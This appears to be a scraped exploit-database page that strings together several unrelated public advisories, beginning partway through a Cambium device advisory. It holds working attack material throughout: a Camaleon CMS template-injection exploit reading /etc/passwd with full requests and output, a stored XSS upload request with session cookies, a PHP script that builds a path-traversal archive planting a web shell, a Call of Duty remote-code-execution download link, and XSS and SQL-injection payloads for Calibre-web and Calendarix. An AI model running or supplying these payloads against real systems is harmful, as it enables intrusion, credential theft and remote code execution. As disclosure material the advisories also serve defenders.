Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash

..

Similarly, Traceroute function can be exploited.

......................................................................................................................................................

3. *Weak Authorization Controls + Information Disclosure*

In addition to 'admin', only 'installer' user has the option to access
device configuration. ‘home’ user does not have GUI option and should
not be able to access / download device configuration. However, the
application lacks strict authorization measures and the low-privileged
'home' user can gain unauthorized access to the device configuration
simply by requesting it.
*Configuration backup export* can be performed by directly accessing
the following url:
*http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json
*
Upon a successful config export, full device configuration with
clear-text passwords, usernames, keys, IP addresses, statistics, logs
etc is downloaded.

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: application/json
Content-Disposition: attachment; filename=<filename>.json
Expires: 0
Date: Sun, 18 Jan 1970 16:50:21 GMT
Server: Cambium HTTP Server

{
"template_props":
{
"templateName":"",
"templateDescription":"",
"device_type":"",

…
<output - snipped>
…
}

.....


Best Regards,

Karn Ganeshen

-- 
Best Regards,
Karn Ganeshen
HireHackking 
Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
Exploit Author: PARAG BAGUL
CVE: CVE-2023-30145

## Description
Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the formats parameter.

## Affected Component
All versions below 2.7.0 are affected.

## Author
Parag Bagul

## Steps to Reproduce
1. Open the target URL: `https://target.com/admin/media/upload`
2. Upload any file and intercept the request.
3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.
4. Check the response. It should return the multiplication of 77 with the
message "File format not allowed (dqopi49vuuvm)".

##Detection:

#Request:

POST /admin/media/upload?actions=false HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/profile/edit
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------327175120238370517612522354688
Content-Length: 1200
Origin: http://target.com
DNT: 1
Connection: close
Cookie: cookie

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="file_upload"; filename="test.txt"
Content-Type: text/plain

test

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="versions"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="thumb_size"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="formats"

test<%= 7*7 %>test
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="media_formats"

image
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="dimension"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="private"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="folder"

/
-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="skip_auto_crop"

true
-----------------------------327175120238370517612522354688--

#Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: cookie
Content-Length: 41

File format not allowed (test49test)

#Exploitation:

To execute a command, add the following payload:
testqopi<%= File.open('/etc/passwd').read %>fdtest

Request:

POST /admin/media/upload?actions=true HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/media
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------104219633614133026962934729021
Content-Length: 1237
Origin: http://target.com
DNT: 1
Connection: close
Cookie: cookie

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="file_upload"; filename="test.txt"
Content-Type: text/plain

test

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="versions"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="thumb_size"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="formats"

dqopi<%= File.open('/etc/passwd').read %>fdfdsf
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="media_formats"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="dimension"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="private"

-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="folder"

/
-----------------------------104219633614133026962934729021
Content-Disposition: form-data; name="skip_auto_crop"

true
-----------------------------104219633614133026962934729021--

Response:

Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Set-Cookie: cookie
Content-Length: 1816

File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
fdfdsf)
HireHackking 
# Exploit Title: CAMALEON CMS 2.4 - Cross-Site Scripting
# Date: 2018-10-11 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://camaleon.tuzitio.com/
# Software Link : https://github.com/owen2345/camaleon-cms
# Software : CAMALEON CMS
# Version : 2.4
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A
 
# HTTP POST Request :
 
POST /admin/media/upload?actions=false HTTP/1.1
Host: demo-7728.tuzitio.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo-7728.tuzitio.com/admin/profile/edit
X-CSRF-Token: D4mT8cg18Rxhpi7fYr9kRRvdCn2dSZXJMbbFeyOynVVMa3aD1pbIXDebhV3B2YwRttvYyoRLRWNf5gGlqX6fNw==
X-Requested-With: XMLHttpRequest
Content-Length: 1575324
Content-Type: multipart/form-data; boundary=---------------------------85707368319206533892056530265
Cookie: _ga=GA1.2.1784268591.1539231194; _gid=GA1.2.1333106602.1539231194; _tuzitio2_session=RHhIbzhHZTlERjFnM3ZUOTFzMnE5c295TCtVQ0QrUmttVGpCZnljaS9ibVM4UE9Ma0VDR2ppcnQzdlNPZFNobUsxdFhNSER4Z3JXYlBxN3VZcTNEbWRXS0ZldERyLzYyQ3d0S3hwSjhzWjBUMHJmaU1WeEt6MDB2QlQ0S0xkbGhUdkNwUHIrRS81ekJ3T2NnOUdnVXB5KzhPS1BnczNvaUtia2x6bmE3N2pzckRPaWI2Skc1RGhJWnZMbERRREZCSXpkU3pxdTMrRlk5WG5XYUMydk9xb1NRY2lzeWt2TWpwVjNodXJNOHFDZG9yczZXVkFMMXU2KzBZSTVqUGNkcDdjV3dBbmFuOVF3Z3BRRlFLcjFtcjVhK3hpak51VUFScVg3czQ0Z2xoOTg9LS1rczBEeWJsaDJPRkhwaTU3UHFSa2h3PT0%3D--f896a698dc0ad774de6bc953d2b9e460e916300f; auth_token=2ysW1sleUvjMJnzIqwlXag&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0&176.41.2.45
Connection: close

-----------------------------85707368319206533892056530265
Content-Disposition: form-data; name="file_upload"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt


Vendor:
=================
www.camunzip.com


Product:
==============
CAM UnZip v5.1


Vulnerability Type:
======================
Archive Path Traversal


CVE Reference:
==============
N/A


Vulnerability Details:
=====================

CAM UnZip fails to check that the paths of the files in the archive do not
engage in path traversal when uncompressing the archive files.
specially crafted files in the archive containing '..\' in file name can
overwrite files on the filesystem by backtracking or allow attackers
to place malicious files on system outside of the target unzip directory
which may lead to remote command execution exploits etc...

Tested successfully Windows 7


Exploit code(s):
===============

malicious archive script...


<?php
#CAM UnZip v5.1
#directory traversal to remote code execution exploit
#====================================================

if($argc<2){echo "Usage: <filename>";exit();}
$file_name=$argv[1];

$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php
exec($_GET["cmd"]); ?>');
$zip->close();

echo "Malicious archive created...\r\n";
echo "========= hyp3rlinx ============";
?>

/////////////////////////////////////////////////////////////////////////////////////

Result:

Creating Folder: C:\Test\BOZO

Extracting Files From: C:\Test\BOZO.zip

Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28

1 file was Extracted.

C:\RCE.php




Exploitation Technique:
=======================
Local


Severity Level:
================
Medium


[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

hyp3rlinx
HireHackking 
A few years ago, I became aware of a security issue in most Call of Duty games.
Although I did not discover it myself, I thought it might be interesting to see what it could be used for.

Without going into detail, this security issue allows users playing a Call of Duty match to cause a buffer overflow on the host’s system inside a stack-allocated buffer within the game’s network handling.
In consquence, this allows full remote code execution!

The code has been published as the vulnerability used has been patched on all cod games as of 4/26/2018.

For more information, read the post at https://momo5502.com/blog/?p=34

Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44582.zip
HireHackking 
# Exploit Title: Stored XSS in Calibre-web
# Date: 07/05/2024
# Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache)
# Vendor Homepage: (https://github.com/janeczku/calibre-web/)
# Version: 0.6.21 - Romesa
# Tested on: Linux 5.15.0-107, Python 3.10.12, lxml	4.9.4
# CVE: CVE-2024-39123

## Vulnerability Description
Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.

## Steps to Reproduce
1. Log in to the application.
2. Upload a new book.
3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint.
4. In the `Comments` field, input the following payload:

    <a href=javas%1Bcript:alert()>Hello there!</a>

4. Save the changes.
5. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.
HireHackking 
source: https://www.securityfocus.com/bid/47790/info


Calendarix is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Calendarix 0.8.20080808 is vulnerable; other versions may also be affected.


<form action="http://www.example.com/cal_login.php?op=login" method="post" name="main" />
<input type="hidden" name="login" value="&#039;SQL_CODE_HERE"/>
<input type="hidden" name="password" value=""/>
<input type="submit" value="submit"/>
</form>

http://www.example.com/cal_login.php/%27%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

<form action="http://www.example.com/cal_catview.php?catop=viewcat" method="post" name="main" />
<input type="hidden" name="gocat" value="&#039;</script><script>alert(document.cookie);</script>"/>
<input type="submit" value="submit"/>
</form>


http://www.example.com/cal_date.php?frmname=%3C/script%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

http://www.example.com/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28123%29;%3C/script%3E